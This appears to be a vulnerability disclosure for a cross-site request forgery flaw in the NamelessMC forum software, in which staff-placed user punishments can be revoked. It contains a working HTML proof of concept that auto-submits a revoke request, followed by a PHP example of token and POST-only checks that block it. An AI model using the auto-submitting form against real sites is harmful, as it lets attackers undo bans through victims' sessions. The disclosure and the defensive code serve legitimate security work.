Cross-Site Request Forgery (CSRF) in namelessmc/nameless
Sep 24th 2021
With this CSRF, any user is able to remove any punishment that staff have placed on any user.
Proof of Concept
After you log in, open this POC.html in a browser. This will remove any punishment that's specified in the POC.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/panel/users/punishments/?user=2&do=revoke&id=1">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
This specific POC removes the 1st punishment (id=1) from user ID 2 (user=2).
This vulnerability can allow banned users to regain access to the site.
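The PoC request succeeds without carrying any per-session secret. As an added example (not NamelessMC's own code; the function names and the `token` field are hypothetical), this PHP shows the server-side check that rejects such a request: the revoke action accepts POST only and requires a session-bound CSRF token.

```php
<?php
// Added example with hypothetical names; not NamelessMC's own code.

// Issue one random token per session and reuse it for every form in that session.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a revoke request may proceed. Returns an HTTP status code.
function check_revoke_request(string $method, array $post, array $session): int
{
    // State changes must not be reachable with GET: a link or form on
    // another site would otherwise trigger them with the staff cookie.
    if ($method !== 'POST') {
        return 405;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['token'] ?? '';
    // hash_equals() compares in constant time; empty or non-string tokens fail.
    if ($expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied)) {
        return 403;
    }
    // The punishment must be identified by well-formed integer IDs.
    foreach (['user', 'id'] as $field) {
        $value = $post[$field] ?? null;
        if (!is_string($value) || !ctype_digit($value)) {
            return 400;
        }
    }
    return 200; // the caller may now perform the revoke
}

// Constructed requests against a staff session.
$session = [];
$token = csrf_token($session);
$cases = [
    'GET as sent by the PoC'  => ['GET', []],
    'POST without a token'    => ['POST', ['user' => '2', 'id' => '1']],
    'POST with a wrong token' => ['POST', ['user' => '2', 'id' => '1', 'token' => 'x']],
    'panel form with token'   => ['POST', ['user' => '2', 'id' => '1', 'token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-26s -> %d\n", $label, check_revoke_request($method, $post, $session));
}
```

The panel's own revoke form would embed the value from `csrf_token()` in a hidden `token` field, which a page on another origin cannot read.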